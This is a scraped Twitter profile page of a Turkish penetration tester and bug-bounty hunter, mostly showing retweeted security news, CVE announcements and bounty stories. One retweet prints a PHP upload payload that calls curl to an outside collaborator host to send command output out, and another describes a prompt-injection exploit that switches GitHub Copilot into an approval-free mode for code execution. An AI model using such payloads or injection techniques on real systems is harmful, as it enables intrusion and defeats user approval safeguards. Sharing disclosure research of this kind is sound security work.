Ugur Cihan Koc (@uceka_) 's Twitter Profile
Ugur Cihan Koc

@uceka_

AdemOglu 🇹🇷 | PenetrationTester | EthicalHacker | BugBountyHunter | oswe | osce | oscp | oswp @cobalt_io @hacker0x01 @bugcrowd

ID: 552107652

linkhttp://www.uceka.com calendar_today12-04-2012 17:25:09

273 Tweet

804 Followers

1,1K Following

PT SWARM (@ptswarm) 's Twitter Profile Photo

💥 New attack! Our researcher Arseniy Sharoglazov discovered a PHP's Arbitrary Object Instantiation with no user-defined classes. It was turned to RCE! Read the research: swarm.ptsecurity.com/exploiting-arb…

💥 New attack! Our researcher Arseniy Sharoglazov discovered a PHP's Arbitrary Object Instantiation with no user-defined classes. It was turned to RCE!

Read the research: swarm.ptsecurity.com/exploiting-arb…
Ugur Cihan Koc (@uceka_) 's Twitter Profile Photo

Finans Sektörü Odaklı Siber Tatbikat & CTF yarışmasında; QNB Finansbank adına takım arkadaşlarım Onur Er ve Hüseyin Ulutürk ile beraber 1. olduk.

Finans Sektörü Odaklı Siber Tatbikat & CTF yarışmasında; QNB Finansbank adına takım arkadaşlarım Onur Er ve Hüseyin Ulutürk ile beraber 1. olduk.
Intigriti (@intigriti) 's Twitter Profile Photo

Did you know a new JWT Attack was recently published?! 🤯️ CVE-2023-30845 bypasses JWT checking by using the X-HTTP-Method-Override request header!

Did you know a new JWT Attack was recently published?! 🤯️

CVE-2023-30845 bypasses JWT checking by using the X-HTTP-Method-Override request header!
Ugur Cihan Koc (@uceka_) 's Twitter Profile Photo

GraphQL DOS Cases uceka.com/2023/12/13/gra… - Introspection-based Circular - Field Duplication - Directives Overloading - Alias Overloading

Shreyas R Gujar 🇮🇳 (@shreyasrx) 's Twitter Profile Photo

OOB RCE > Unauth + Unrestricted File Upload API Uploading files possible, but paths redirect to default page, blocking direct execution. Payload: <?php system('curl burp.collabo.com -d "data=$(id)"') ?> #bugbounty #bugbountytips #CyberSecurity

OOB RCE &gt; Unauth + Unrestricted File Upload API 

Uploading files possible, but paths redirect to default page, blocking direct execution.

Payload: 
&lt;?php
system('curl burp.collabo.com -d "data=$(id)"')
?&gt;

#bugbounty #bugbountytips #CyberSecurity
Samuel (@saamux) 's Twitter Profile Photo

Yay, today was a good day, after reading JS files for 10 hours and with several chains I found an ATO without interaction bypassing the client and server side encryption mechanism. I recommend this article, it helped me a lot, the bug was triaged :). infosecwriteups.com/bypassing-asym…

Lupin (@0xlupin) 's Twitter Profile Photo

Today I received a $12,000 bounty using the Sandwich Attack ! 🤑 The vulnerability allowed me to enumerate the API Keys of other users 🤯 How did I do that ? Well the API key was a UUIDv1. If you are not familiar with UUIDv1s you need to know that they are constructed in 6

Today I received a $12,000 bounty using the Sandwich Attack ! 🤑

The vulnerability allowed me to enumerate the API Keys of other users 🤯

How did I do that ? Well the API key was a UUIDv1. If you are not familiar with UUIDv1s you need to know that they are constructed in 6
Mobile Security (@mobilesecurity_) 's Twitter Profile Photo

Deobfuscating Android ARM64 strings with Ghidra: Emulating, Patching, and Automating #MobileSecurity #AndroidSecurity by Jeroen Beckers and NVISO Labs blog.nviso.eu/2024/01/15/deo…

Ian Carroll (@iangcarroll) 's Twitter Profile Photo

In April, Sam Curry and I discovered a way to bypass airport security via SQL injection in a database of crewmembers. Unfortunately, DHS ghosted us after we disclosed the issue, and the TSA attempted to cover up what we found. Here is our writeup: ian.sh/tsa

0xor0ne (@0xor0ne) 's Twitter Profile Photo

Analysis of backdoored SSH (CVE-2024-6387) exploits santandersecurityresearch.github.io/blog/sshing_th… Credits Santander's security team #ssh #infosec

Analysis of backdoored SSH (CVE-2024-6387) exploits

santandersecurityresearch.github.io/blog/sshing_th…

Credits Santander's security team

#ssh #infosec
Johann Rehberger (@wunderwuzzi23) 's Twitter Profile Photo

💥 Remote Code Execution in GitHub Copilot (CVE-2025-53773) 👉 Prompt injection exploit writes to Copilot config file and puts it into YOLO mode, then we get immediate RCE 🔥 Bypasses all user approvals 🛡️ Patch is out today. Update before someone else does it for you

pyn3rd (@pyn3rd) 's Twitter Profile Photo

#CVE-2025-55182: RSC RCE — It functions as an in-memory webshell backdoor, offering a significantly more covert foothold. Please verify this again on your own endpoint.

#CVE-2025-55182: RSC RCE — It functions as an in-memory webshell backdoor, offering a significantly more covert foothold. Please verify this again on your own endpoint.
¯\_(ツ)_/¯ (@chocapikk_) 's Twitter Profile Photo

CVE-2026-21858 + CVE-2025-68613: n8n Ni8mare - Full Chain Exploit Unauthenticated to Root RCE: - LFI via Content-Type confusion - Read /proc/self/environ to find HOME - Steal encryption key + database - Forge admin JWT token - Expression injection sandbox bypass - RCE as root

CVE-2026-21858 + CVE-2025-68613: n8n Ni8mare - Full Chain Exploit

Unauthenticated to Root RCE:
- LFI via Content-Type confusion
- Read /proc/self/environ to find HOME
- Steal encryption key + database
- Forge admin JWT token
- Expression injection sandbox bypass
- RCE as root
Youssef Sammouda (sam0) (@samm0uda) 's Twitter Profile Photo

$312,500 worth of stored/reflected XSS vulnerabilities in Meta’s Conversions API Gateway allowed Javascript code to run on any Facebook domain and millions of third-party websites. The flaw enabled zero-click Facebook account takeover and more: ysamm.com/uncategorized/…

Ayet Hadis Söz (@ayet1hadis) 's Twitter Profile Photo

"Bir imtihan size ansızın geldiği gibi, bir kurtuluşta ansızın gelecektir. * Allah'a tevekkül et ve ümitsizliğe kapılma."